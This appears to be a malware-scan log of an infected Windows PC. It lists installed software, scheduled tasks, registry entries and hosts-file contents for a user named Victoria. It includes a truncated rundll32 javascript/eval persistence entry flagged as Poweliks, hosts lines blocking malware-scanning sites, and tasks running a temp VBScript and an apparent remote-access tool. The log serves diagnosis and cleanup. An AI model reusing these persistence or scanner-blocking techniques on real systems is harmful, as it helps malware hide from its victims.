(HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version: - Microsoft) Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (x32 Version: - Microsoft) Hidden Settings Alerter (HKLM-x32\...\Settings Alerter) (Version: 4.5.0.5415 - Koyote-Lab, Inc) <==== ATTENTION Shop To Win (HKLM-x32\...\{6FA9069B-C709-4092-878D-36FB41F6292F}_is1) (Version: 1.1.0.0 - Shop To Win, LLC) Skins (x32 Version: 2010.0517.1742.29870 - ATI) Hidden Skype Toolbars (HKLM-x32\...\{981029E0-7FC9-4CF3-AB39-6F133621921A}) (Version: 1.0.4051 - Skype Technologies S.A.) Skype™ 6.11 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.) SonicStage 4.3 (HKLM-x32\...\{A0EB195B-5876-48E6-879D-33D4B2102610}) (Version: 4.3 - Sony Corporation) SpongeBob Typing (x32 Version: 2.2.0.98 - WildTangent) Hidden Spytech SpyAgent (HKLM-x32\...\Spytech SpyAgent) (Version: - ) Star Wars® Knights of the Old Republic® II: The Sith Lords (HKLM-x32\...\{629F65FB-7F3C-4D66-A1C0-20722744B7B6}) (Version: 1.00.0000 - Obsidian) Star Wars®: Knights of the Old Republic (HKLM-x32\...\{2A9A40C7-6670-4D5F-8F41-D12E2E08B48B}) (Version: - ) State of Decay (HKLM-x32\...\State of Decay_is1) (Version: - ) Street Fighter X Tekken (HKLM-x32\...\{43430FA5-AF68-4A2D-A7D4-891000008200}) (Version: 1.0.0.0 - CAPCOM U.S.A., INC) SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 5.0.1148 - SUPERAntiSpyware.com) swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden System Requirements Lab CYRI (HKLM-x32\...\{F3FCB08B-E752-444D-86A0-0634A4F3B23D}) (Version: 6.0.8.0 - Husdawg, LLC) System Requirements Lab Detection (HKLM-x32\...\{A407FC22-36BF-4C82-A516-59D94BC505A9}) (Version: 1.0.5.0 - Husdawg, LLC) TAP-Windows 9.9.2 (HKLM\...\TAP-Windows) (Version: 9.9.2 - ) TaxACT 2006 (HKLM-x32\...\TaxACT 2006) (Version: - 2nd Story Software, Inc.) TaxACT 2008 (HKLM-x32\...\TaxACT 2008) (Version: - 2nd Story Software, Inc.) TaxACT 2009 (HKLM-x32\...\TaxACT 2009) (Version: - 2nd Story Software, Inc.) TaxACT 2011 - 1040 Edition (HKLM-x32\...\TaxACT 2011 - 1040 Edition) (Version: - 2nd Story Software, Inc.) The Walking Dead Season 2 EP 2 (HKLM-x32\...\The Walking Dead Season 2 EP 2_is1) (Version: - ) The Walking Dead: Season 2 (HKLM-x32\...\VGhlV2Fsa2luZ0RlYWRTZWFzb24y_is1) (Version: 1 - ) The Wolf Among Us Episode 2 (HKLM-x32\...\The Wolf Among Us Episode 2_is1) (Version: - CODEX) The Wolf Among Us Episode 3 (HKLM-x32\...\The Wolf Among Us Episode 3_is1) (Version: - ) Trusteer Endpoint Protection (HKLM-x32\...\Rapport_msi) (Version: 3.5.1403.67 - Trusteer) Unlocker 1.9.1-x64 (HKLM\...\Unlocker) (Version: 1.9.1 - Cedrick Collomb) Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B4A38370-2ADB-46B0-A1B0-0C4A2F7DCA31}) (Version: - Microsoft) Update for Microsoft Excel 2010 (KB2837600) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{4ACD847E-547D-493F-9A86-F73EAE1B5174}) (Version: - Microsoft) Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version: - Microsoft) Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version: - Microsoft) Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{4EEA3D3E-989C-4DF4-AB0A-3042C0C12AA3}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{DADF7E25-FFA4-4D02-BE84-1DAE62C18516}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{287A1E92-9E41-4BC1-8920-B3D0E9220800}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{9D69691D-823D-4C3E-9B12-563A3F520366}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{5AA578BB-759C-40FD-9661-A737C0884541}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{F1A20C69-9FE5-40FD-9CD5-84EABC2EF64A}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2837581) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{334FB202-28D7-4BA4-8BC9-4FE4AB233EA0}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2837606) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0D672F7-883E-4279-8E75-D97A5445AB46}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2878252) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B0DB9F71-E0F7-4FE6-8925-35B860CAC0C4}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0409-0000-0000000FF1CE}_Office14.SingleImage_{C0BDC1DE-C35E-422B-8CBD-C1D555468720}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.SingleImage_{089DBFD7-8211-43B2-AAAE-5BDD8C23E3A8}) (Version: - Microsoft) Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.SingleImage_{794A0574-4E2F-4D58-B2A0-D7460ACDC85C}) (Version: - Microsoft) Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version: - Microsoft) Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version: - Microsoft) Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.SingleImage_{DCE104A1-1875-4469-A83D-A5BFA6C4640F}) (Version: - Microsoft) Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2AB483F1-C86E-427A-83B4-23889B03512D}) (Version: - Microsoft) Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM-x32\...\{90140000-0018-0409-0000-0000000FF1CE}_Office14.SingleImage_{334AA0A1-2BB1-4D74-B66A-2B2C4D9C2C87}) (Version: - Microsoft) Update for Microsoft PowerPoint 2010 (KB2837579) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{2BA40F82-F3A4-441C-BF1A-ED4C42FF4872}) (Version: - Microsoft) Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.SingleImage_{F9F5A080-AF38-4966-9A6B-C43DCA465035}) (Version: - Microsoft) Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{7B29D8B8-6A87-496C-A65E-B935E740448A}) (Version: - Microsoft) Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{38CF30E4-3348-4BD1-A859-B630C355A56F}) (Version: - Microsoft) Update for Microsoft Word 2010 (KB2880529) 32-Bit Edition (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{B9B89E01-5B6B-4F73-BC34-B2C0D8ACB4CD}) (Version: - Microsoft) Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden UpdateService (x32 Version: 1.0.0 - RealNetworks, Inc.) Hidden VideoConverter (HKLM-x32\...\VideoConverter) (Version: - PerformerSoft LLC) <==== ATTENTION VideoPad Video Editor (HKLM-x32\...\VideoPad) (Version: 3.61 - NCH Software) Visual Studio 2008 x64 Redistributables (HKLM-x32\...\{FCDBEA60-79F0-4FAE-BBA8-55A26C609A49}) (Version: 10.0.0.2 - AVG Technologies) VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN) VSO ConvertXToDVD (HKLM-x32\...\{CE1F93C0-4353-4C9D-84DA-AB4E7C63ED32}_is1) (Version: 5.0.0.74 - VSO Software) Watchtower Library 2009 - English (HKLM-x32\...\{4ABB4D92-0682-4887-A0BC-CE5F920DDD23}) (Version: 11.0 - Watchtower Bible and Tract Society of Pennsylvania, Inc.) Watchtower Library 2010 - English (HKLM-x32\...\{57729BE1-DE2C-45DB-9FFA-5C1949679B3E}) (Version: 12.0 - Watchtower Bible and Tract Society of Pennsylvania, Inc.) Watchtower Library 2011 - English (HKLM-x32\...\{EED1EFD7-2703-4f7e-9820-EAA3C4723EA3}) (Version: 13.0 - Watchtower Bible and Tract Society of Pennsylvania, Inc.) Watchtower Library 2012 - English (HKLM-x32\...\{11B5A3EB-8B76-46A9-A4B7-1C1FF5A3AAFD}) (Version: 14.0 - Watchtower Bible and Tract Society of Pennsylvania, Inc.) WBFS to ISO (HKLM-x32\...\{55F0E086-2E1C-4478-B52E-DA6025A46434}_is1) (Version: - wbfstoiso.com) WildTangent Games (HKLM-x32\...\WildTangent dell Master Uninstall) (Version: 1.0.3.0 - WildTangent) WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.3.0 - WildTangent) WildTangent Games App (Dell Games) (x32 Version: 4.0.10.2 - WildTangent) Hidden Windows Live Communications Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3508.0205 - Microsoft Corporation) Windows Live Essentials (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live Family Safety (Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live Family Safety (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live ID Sign-in Assistant (Version: 7.250.4311.0 - Microsoft Corporation) Hidden Windows Live Installer (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live Mail (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live Messenger (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live MIME IFilter (Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live Photo Common (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live PIMT Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live SOXE (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live SOXE Definitions (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live Sync (HKLM-x32\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation) Windows Live UX Platform (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live UX Platform Language Pack (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live Writer (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden Windows Live Writer Resources (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden WinRAR 4.20 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 4.20.0 - win.rar GmbH) WinZip 17.0 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240D7}) (Version: 17.0.10283 - WinZip Computing, S.L. ) Wondershare DVD Creator(Build 2.6.5) (HKLM-x32\...\Wondershare DVD Creator_is1) (Version: - Wondershare) Yahoo! Messenger (HKLM-x32\...\Yahoo! Messenger) (Version: - Yahoo! Inc.) Yahoo! Software Update (HKLM-x32\...\Yahoo! Software Update) (Version: - ) Yahoo! Toolbar (HKLM-x32\...\Yahoo! Companion) (Version: - Yahoo! Inc.) Zooloretto (x32 Version: 2.2.0.98 - WildTangent) Hidden ==================== Custom CLSID (selected items): ========================== (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.) CustomCLSID: HKU\S-1-5-21-2698232268-2154043033-3228781758-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\Victoria\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64\SkyDriveShell64.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-2698232268-2154043033-3228781758-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? CustomCLSID: HKU\S-1-5-21-2698232268-2154043033-3228781758-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\Victoria\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64\SkyDriveShell64.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-2698232268-2154043033-3228781758-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\Victoria\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64\SkyDriveShell64.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-2698232268-2154043033-3228781758-1000_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Victoria\AppData\Local\Microsoft\SkyDrive\16.4.6013.0910\amd64\FileSyncApi64.dll (Microsoft Corporation) ==================== Restore Points ========================= 14-09-2014 07:01:49 Checkpoint by HitmanPro 14-09-2014 07:06:16 Checkpoint by HitmanPro 14-09-2014 23:00:38 Windows Backup 15-09-2014 10:11:42 Windows Defender Checkpoint 15-09-2014 21:06:01 Checkpoint by HitmanPro ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2014-09-01 15:02 - 2014-09-15 19:33 - 00016223 ____A C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 metascan.org 127.0.0.1 www.metascan-online.com 127.0.0.1 virus-trap.org 127.0.0.1 anubis.iseclab.org 127.0.0.1 metascan.org 127.0.0.1 www.metascan-online.com 127.0.0.1 virus-trap.org 127.0.0.1 anubis.iseclab.org 127.0.0.1 metascan.org 127.0.0.1 www.metascan-online.com 127.0.0.1 virus-trap.org 127.0.0.1 anubis.iseclab.org 127.0.0.1 metascan.org 127.0.0.1 www.metascan-online.com 127.0.0.1 virus-trap.org 127.0.0.1 anubis.iseclab.org 127.0.0.1 metascan.org 127.0.0.1 www.metascan-online.com 127.0.0.1 virus-trap.org 127.0.0.1 anubis.iseclab.org 127.0.0.1 metascan.org 127.0.0.1 www.metascan-online.com 127.0.0.1 virus-trap.org 127.0.0.1 anubis.iseclab.org 127.0.0.1 metascan.org 127.0.0.1 www.metascan-online.com 127.0.0.1 virus-trap.org 127.0.0.1 anubis.iseclab.org 127.0.0.1 metascan.org There are 494 more lines. ==================== Scheduled Tasks (whitelisted) ============= (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.) Task: {0AC917F1-E3DE-4C14-A968-8C306C9F9A2F} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-2698232268-2154043033-3228781758-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2014-06-10] (RealNetworks, Inc.) Task: {10DE3E35-4A76-41AF-A167-782804B17F11} - System32\Tasks\RealCreateProcessScheduledTask191247491S-1-5-21-2698232268-2154043033-3228781758-1000 => c:\program files (x86)\real\realplayer\realplay.exe [2014-06-30] (RealNetworks, Inc.) Task: {33996CA1-2818-458C-8448-5FE2F923B40E} - System32\Tasks\NCH Software\VideoPadSevenDays => C:\Program Files (x86)\NCH Software\VideoPad\VideoPad.exe Task: {3EF61FF3-1773-43A6-9738-B786F8552382} - System32\Tasks\{F410990A-E398-4367-B608-7256C0DAE4D2} => C:\Program Files (x86)\booddanet\Half-Life 2\hl2.exe [2007-02-20] () Task: {47998353-6C27-4C27-96CF-CB3D980FA4D0} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-06-24] (Piriform Ltd) Task: {492F5901-5FAD-4421-8206-4547A747B6EB} - System32\Tasks\DriverBoost-RTMUpdater => C:\Program Files (x86)\DriverBoost\DriverBoost\DriverBoost.exe [2013-10-24] (PC Drivers Headquarters) Task: {4E1CCEFB-50FC-427D-A578-4E4706C6B33C} - System32\Tasks\DriverBoost-RTMScan => C:\Program Files (x86)\DriverBoost\DriverBoost\DriverBoost.exe [2013-10-24] (PC Drivers Headquarters) Task: {684C344D-2D32-4A3C-9EC6-B0595903B458} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-01-20] (Adobe Systems Incorporated) Task: {6BF9BC97-22C9-46B0-A7CD-3A0656AF5956} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\My Dell\uaclauncher.exe [2014-01-31] (PC-Doctor, Inc.) Task: {6EFC4897-100E-43DB-80D6-CF445561DCA8} - System32\Tasks\{0370FED2-1BA4-475D-A03D-43001AC60595} => C:\Users\Victoria\Desktop\DataScrambler\DataScrambler.exe Task: {84434FEC-BB06-4A43-B4B5-D61DD972AC06} - System32\Tasks\AdobeAAMUpdater-1.0-Victoria-PC-Victoria => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2013-06-03] (Adobe Systems Incorporated) Task: {84E8609A-5DAA-4196-B936-8D18F5E031C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2010-11-29] (Google Inc.) Task: {88ED1EE1-E91D-4BE5-8D03-23156344F7AE} - System32\Tasks\{848F7A6C-081D-440B-860A-7DF6E8393379} => C:\Users\Victoria\Desktop\DataScrambler\DataScrambler.exe Task: {891E115C-A934-44BC-A919-198AB72093C5} - System32\Tasks\AVG-Secure-Search-Update_0814tb_rel => C:\Program Files (x86)\AVG Security Toolbar\AVG-Secure-Search-Update_0814tb.exe Task: {89CA0B8F-C706-4808-97FA-6836C50F947C} - System32\Tasks\{B8BF2E63-DF04-4CC2-AAD0-CB52E2AD9362} => C:\Users\Victoria\Desktop\DataScrambler\DataScrambler.exe Task: {8A8A76D6-FB8B-4B97-84CB-7427A1DB78B9} - System32\Tasks\RealUpgradeLogonTaskS-1-5-21-2698232268-2154043033-3228781758-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2014-06-10] (RealNetworks, Inc.) Task: {954E683D-5C25-4233-B792-24B2623EA401} - System32\Tasks\PCDEventLauncherTask => C:\Program Files\My Dell\sessionchecker.exe [2014-01-31] (PC-Doctor, Inc.) Task: {95789437-6591-464F-8E15-68464056EFD6} - \eType Setup No Task File <==== ATTENTION Task: {9B5DE188-FCA2-48EF-9087-A62A227B50B8} - System32\Tasks\{BE3C13E3-09F8-4755-BAA7-1662BE6391C8} => C:\Program Files (x86)\booddanet\Half-Life 2\hl2.exe [2007-02-20] () Task: {9D0E67AB-CA6F-4064-838E-08548D448B0A} - System32\Tasks\0 => Iexplore.exe <==== ATTENTION Task: {9DCEAC5B-C417-4C83-AE78-A232CD420939} - System32\Tasks\SystemToolsDailyTest => uaclauncher.exe Task: {AE73005E-C445-468F-85D0-96D7418B276E} - System32\Tasks\DriverBoost-RTMRules => C:\Program Files (x86)\DriverBoost\DriverBoost\DriverBoost.exe [2013-10-24] (PC Drivers Headquarters) Task: {B6FC4588-3E9A-4873-A3B8-B0D83ED3B95C} - System32\Tasks\{F69AE2BB-19E2-4F5F-A3B0-490A1B824A19} => C:\Users\Victoria\Desktop\Imminent Monitor\DataScrambler\DataScrambler.exe Task: {B8E3F7FB-6D94-43DF-8424-E60562B9E353} - System32\Tasks\5014 => Wscript.exe C:\Users\Victoria\AppData\Local\Temp\launchie.vbs //B <==== ATTENTION Task: {C000CB22-2CAE-4D94-B7E3-6D0F48F4592A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2010-11-29] (Google Inc.) Task: {C2B650F4-262B-462D-842F-57806165DB82} - System32\Tasks\NCH Software\ExpressZipReminder => C:\Program Files (x86)\NCH Software\ExpressZip\ExpressZip.exe Task: {C822E71A-750F-4CC2-A2E8-98EFF0556258} - System32\Tasks\{D734C5AB-D32C-49EC-8CCF-0E03D456A788} => C:\Users\Victoria\Desktop\Imminent Monitor\DataScrambler\DataScrambler.exe Task: {C84F6062-3FF1-4593-BFDC-37C96043BBA9} - System32\Tasks\RealUpgradeScheduledTaskS-1-5-21-2698232268-2154043033-3228781758-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2014-06-10] (RealNetworks, Inc.) Task: {D349298D-BF91-400D-8494-D873F91B605A} - System32\Tasks\Microsoft\Windows\WindowsBackup\AutomaticBackup => Rundll32.exe /d sdengin2.dll,ExecuteScheduledBackup Task: {DB7FC948-E7FF-453F-A570-A023034D68D2} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-2698232268-2154043033-3228781758-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2014-06-10] (RealNetworks, Inc.) Task: {DC95C021-3C5C-4FE7-84AA-325AF8D3AED1} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-2698232268-2154043033-3228781758-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\realupgrade.exe [2014-06-10] (RealNetworks, Inc.) Task: {E93B13C4-6E9B-445E-9A5B-E3FDA50E13D4} - System32\Tasks\AVG-Secure-Search-Update_0814tb_rmv => C:\Program Files (x86)\AVG Security Toolbar\AVG-Secure-Search-Update_0814tb.exe Task: {ED0BFCD5-F588-4655-BD4F-88440222AD26} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.) Task: {EEAD3EB8-B72E-466B-9638-8AF8810B48AD} - \ProtectedSearch\Protected Search No Task File <==== ATTENTION Task: {F44EE16D-85A1-4E7B-9028-4BB2799FC4FF} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-2698232268-2154043033-3228781758-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2014-06-10] (RealNetworks, Inc.) Task: {FA0C7610-6900-4A8C-BA3C-BE4C9AAF5C2A} - System32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-2698232268-2154043033-3228781758-1000 => C:\Program Files (x86)\RealNetworks\RealDownloader\recordingmanager.exe [2014-06-10] (RealNetworks, Inc.) Task: {FE363D7E-3F91-4025-A83F-20AB8C0CE157} - System32\Tasks\NCH Software\ExpressBurnSevenDays => C:\Program Files (x86)\NCH Software\ExpressBurn\ExpressBurn.exe Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\Windows\Tasks\AVG-Secure-Search-Update_0814tb_rel.job => C:\Program Files (x86)\AVG Security Toolbar\AVG-Secure-Search-Update_0814tb.exe Task: C:\Windows\Tasks\AVG-Secure-Search-Update_0814tb_rmv.job => C:\Program Files (x86)\AVG Security Toolbar\AVG-Secure-Search-Update_0814tb.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe ==================== Loaded Modules (whitelisted) ============= 2010-12-03 13:40 - 2007-02-27 07:20 - 00125952 _____ () C:\Windows\system32\spool\PRTPROCS\x64\lxdddrpp.dll 2014-06-10 17:50 - 2014-06-10 17:50 - 00039568 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe 2014-06-10 22:03 - 2014-06-10 22:03 - 00023552 _____ () C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe 2010-12-03 13:39 - 2009-04-27 15:37 - 00291496 _____ () C:\Program Files (x86)\Lexmark 2500 Series\lxddmon.exe 2010-12-03 13:39 - 2009-04-27 15:37 - 00025256 _____ () C:\Program Files (x86)\Lexmark 2500 Series\lxddamon.exe 2006-06-06 13:10 - 2006-06-06 13:10 - 01085440 _____ () C:\Program Files (x86)\NETGEAR\WG111v2\WG111v2.exe 2010-11-18 19:14 - 2011-08-18 11:05 - 02751808 _____ () C:\Program Files (x86)\Dell DataSafe Local Backup\COMPONENTS\SCHEDULER\STSERVICE.EXE 2014-04-25 03:34 - 2014-06-30 20:27 - 00861784 _____ () c:\program files (x86)\real\realplayer\RPDS\Plugins\cldplin.dll 2010-12-03 13:39 - 2007-01-09 19:10 - 00278528 _____ () C:\Program Files (x86)\Lexmark 2500 Series\lxddscw.dll 2010-12-03 13:39 - 2007-03-06 10:16 - 00589824 _____ () C:\Program Files (x86)\Lexmark 2500 Series\lxdddatr.dll 2010-12-03 13:39 - 2006-12-28 13:47 - 00073728 _____ () C:\Program Files (x86)\Lexmark 2500 Series\lxddcats.dll 2010-12-03 13:39 - 2008-05-16 14:35 - 00040960 _____ () C:\Program Files (x86)\Lexmark 2500 Series\App4R.Monitor.Core.dll 2010-12-03 13:39 - 2008-05-16 14:35 - 00028672 _____ () C:\Program Files (x86)\Lexmark 2500 Series\App4R.Monitor.Common.dll 2010-12-03 13:39 - 2008-05-16 14:34 - 00057344 _____ () C:\Program Files (x86)\Lexmark 2500 Series\App4R.DevMons.MCMDevMon.dll 2010-12-03 13:39 - 2007-04-30 10:19 - 00020480 _____ () C:\Program Files (x86)\Lexmark 2500 Series\App4R.DevMons.NetworkCardDevMon.dll 2010-12-03 13:39 - 2007-04-30 10:19 - 00020480 _____ () C:\Program Files (x86)\Lexmark 2500 Series\App4R.DevMons.ScanDevMon.dll 2010-12-03 13:39 - 2007-04-30 10:20 - 00011776 _____ () C:\Program Files (x86)\Lexmark 2500 Series\App4R.DevMons.MCMDevMon.AutoPlayUtil.dll 2005-07-20 05:53 - 2005-07-20 05:53 - 00966765 _____ () C:\Program Files (x86)\NETGEAR\WG111v2\acAuth.dll 2005-11-13 15:22 - 2005-11-13 15:22 - 00217088 _____ () C:\Program Files (x86)\NETGEAR\WG111v2\NWTools.dll 2014-03-23 17:04 - 2014-03-23 17:04 - 00557056 _____ () C:\Program Files (x86)\Trusteer\Rapport\bin\js32.dll 2014-09-11 13:38 - 2014-09-03 23:01 - 01098056 _____ () C:\Program Files (x86)\Google\Chrome\Application\37.0.2062.120\libglesv2.dll 2014-09-11 13:38 - 2014-09-03 23:01 - 00174408 _____ () C:\Program Files 